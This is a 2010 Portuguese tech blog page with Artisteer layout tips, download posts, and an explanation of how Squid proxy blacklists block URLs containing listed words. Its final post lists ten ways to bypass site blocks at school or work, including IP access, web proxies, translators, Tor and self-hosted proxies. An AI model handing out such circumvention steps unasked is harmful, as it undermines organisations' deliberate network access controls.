Muitos websites são identificados por suas logomarcas, ou seja, algo que simbolize a idéia principal dele de maneira sintética e gráfica. Contudo, não é preciso ter um desenho super elaborado para atrair seus visitantes. É claro que quanto mais bonito o desenho, mais agradável fica o seu visual. Para lhe ajudar, o Artisteer tem uma série de desenhos, fotos, fontes, efeitos de brilho e vários outros recursos para ajudar na hora de criar a sua marca digital. Você também pode optar por imagens que você já tenha no seu computador, basta ajustá-las ao formato do seu layout.

Todos estes recursos estão relacionados à forma do seu blog ou site. Portanto se você está pensando em fazer um blog ou site com formas arredondadas, lembre-se de seguir este padrão para deixá-lo harmonioso. Do contrário, ter muitas formas variadas pode causar estranheza no seu visitante e talvez ele não volte. Todas as abas que tratam deste tipo de assunto possuem modelos variados, além dos botões de sugestões automáticas do Artisteer. No caso dos menus é possível determinar se vai ser operado por botões, abas e até mesmo se haverá subitens no estilo cascata ou naquele que você achar melhor.

O rodapé é uma parte importante dos layouts que é um tanto desprezada na hora de criar estes esquemas. Nele, você insere informações importantes inclusive sobre os direitos autorais e de distribuição do conteúdo presente na sua página, hiperlinks para algum lugar que você considere importante, RSS feeds para serem subscritos pelos seus visitantes e qualquer outra informação que você considere necessário, como formas de contato com o criador do layout e outras.

Quando terminar de editar estes pontos, volte à primeira aba “Ideias” e exporte seu projeto clicando na parte superior do botão. Você pode editar suas preferências de exportação de layout clicando na metade inferior do botão. Nesta janela, é possível determinar alguns hiperlinks e marca d’águas opcionais que você queira que apareçam no seu layout depois de finalizado. Depois, é verificar a maneira de trocar os layouts do seu servidor e inserir a sua criação.

Como montar um provedor de internet!


Bom galera aqui vai um não um tutorial mais um trabalho de alunos de uma universidade explicando de forma detalhada como funciona um provedor o que você precisa e tals. 


TAMANHO:  699kb


DOWNLOAD

sábado, 25 de setembro de 2010

Mini curso Valve Hammer Editor! Crie seus próprios mapas para counter-strike!


Mini curso para quem quer aprender a criar os própios mapas para Counter Strike, o programa ja vem junto com o curso,  para o programa funcionar você vai precisar ter o jogo instalado!


TAMANHO: 3,32 MB
EXTENSÃO:  .rar, .doc e .pdf

DOWNLOAD

sexta-feira, 24 de setembro de 2010

Como funcionam os “bloqueadores de sites”? – EXPLICAÇÃO

Bom amigo (a) está é mais uma matéria do Hc Host, a intenção e que você entenda como funcionam os filtros que bloqueiam os sites "indevidos" em sua escola, empresa ou em qualquer outro lugar.
Vamos começar, para exemplificar a situação tomemos como exemplo o seguinte link:
http://www.google.com.br/search?hl=pt&q=orkut&aq=f&aqi=&aql=&oq=&gs_rfai=
Vamos supor que você deseje pesquisar sobre Orkut, mas talvez você só quisesse procurar um recadinho legal ou depoimento, você não quer entrar no Orkut! (nãoo imagina).
Bom, prosseguindo, quando você digitou Orkut na pesquisa do Google, retornou um erro parecido com este:


Ai você se pergunta por que isto aconteceu se você só está fazendo uma pesquisa no Google, você nem está tentando acessar direto o www.orkut.com.br.
O que houve de errado? Calma, vou explicar como funciona. Na sua escola ou empresa, existe um computador central chamado de servidor que fica responsável pela rede de computadores e filtra tudo que pode ou não passar.
Um dos servidores mais usados é o Squid, ele é um programa para gerenciamento da rede, e dentro de sua pasta existe um arquivo do bloco de notas (.txt) chamado mais ou menos assim:
blacklist.txt
Dentro deste arquivo existe uma lista de sites e palavras bloqueadas. O Squid lê o link, no exemplo é o mesmo do começo:
http://www.google.com.br/search?hl=pt&q=orkut&aq=f&aqi=&aql=&oq=&gs_rfai=
Como pode ver no link de pesquisa do Google ele encontrou uma palavra que estava na sua lista negra, Orkut no exemplo. Ai ele simplesmente vai retornar aquele erro, dizendo que o acesso foi negado.
Uma rápida pesquisa no nosso blog você encontrará de forma fácil como acessar estes sites mesmo que estejam bloqueados.
Lembre-se de que se o site está bloqueado é justamente para você não acessar, caso você ainda queria acessá-los, fica por sua conta e risco.





segunda-feira, 20 de setembro de 2010

10 Maneiras de acessar um site bloqueado

1 – Acesse pelo IP:

Esta é a maneira mais simples de burlar bloqueios apenas por url. Ao invés de digitar por exemplo, youtube.com, você digitaria 208.65.153.242. Uma ferramenta online que lhe mostra o IP de um site você encontra Aqui

2 – Utilize o cache do Google:

Se o site que deseja acessar não é tão atualizado, ou a informação que procurada não é a mais recente, você pode tentar a imagem que está armazenada no Google. É só clicar no “Em cache” nos resultados do Google. Ou digitar o comando “cache:site” na pesquisa do Google. Exemplo: cache:http://gulp.com.br

3 – Tente um Anonymizer:

Por este método você acessa através de um terceiro servidor. São serviços oferecidos muitas vezes gratuitamente, onde você acessa o site que deseja, mas não sai deste outro site, que busca as informações que você quer.

O problema acontece quando alguns desses serviços já estão bloqueados, ai deve-se tentar outra maneira. Para ver bons serviços, procure aqueles que encriptam a url, experimente utilizar o Proxify e o Block Stop, já famoso Anonymouse não oculta a url, então fica mais fácil ser descoberto pelos serviços de filtro.

4 – Utilize os tradutores online:

Esse método funciona quase igual ao descrito acima, como um web proxy. Você pode tentar o Babel fish do altavista e o Google Translate.

5 – Utilize o Google Mobile Search:

Não é a melhor maneira de ver o resultado, mas funciona, também similar a utilizar um web proxy.Link para o serviço .

6 – Utilize um servidor Proxy gratuito:

Existem diversos servidores proxies gratuitos. Por este método você deverá mudar sua configuração da internet, o que se faz facilmente em qualquer browser. Aqui segue uma lista deles. Os que iniciam com 200 correspondem a proxies no Brasil e podem ser mais rápidos.

7 – Receba páginas por e-mail:

Dessa maneira você receberá uma página de cada vez. Obviamente, não é possível acessar uma grande quantidade de informações.

Alguns serviços; você utiliza SEND http://www.yahoo.com/ no corpo da mensagem e envia para agora@dna.affrc.go.jp Este endereço de e-mail está protegido contra spambots. Você deve habilitar o JavaScript para visualizá-lo. para receber a página. Serviços semelhantes ao web2mail.

G.E Boyd tem uma grande lista de servidores, mas muitos já não estão funcionando.

8 – Tenha seu próprio servidor proxy:

Esta é uma técnica mais avançada e possivelmente a melhor. Ela necessita de um servidor que pode estar em sua casa ou um host.

Você pode habilitar encriptação SSL e prevenir o roubo de conteúdo. Também coloque algum controle de acesso, mas sempre tenha em mente que alguém poderá encontrar e burlar sua segurança.

Utilize o servidor Apache como servidor proxy, seguindo estes procedimentos (um pouco complexo)
Com o Privoxy – mais recomendado – basta seguir as instruções desta página.

Ou utilize o PHPProxy como seu servidor proxy. Você pode usar PHPProxy e fazer sua configuração.

9 – Use um proxy distribuído Tor:

Tor é um servidor proxy avançado que utiliza múltiplos servidores anônimos para um único request.

Este necessita que você baixe e instale este aplicativo.

10 – Utilize um serviço alternativo:

Quando tudo acima falhar, você pode tentar trocar os serviços.

Se o Gmail é bloqueado, você pegar qualquer outro serviço de e-mail mais desconhecido e habilitar o encaminhamento de mensagem no Gmail para este.

Obs : Um desse sertamente dará serto Hc Host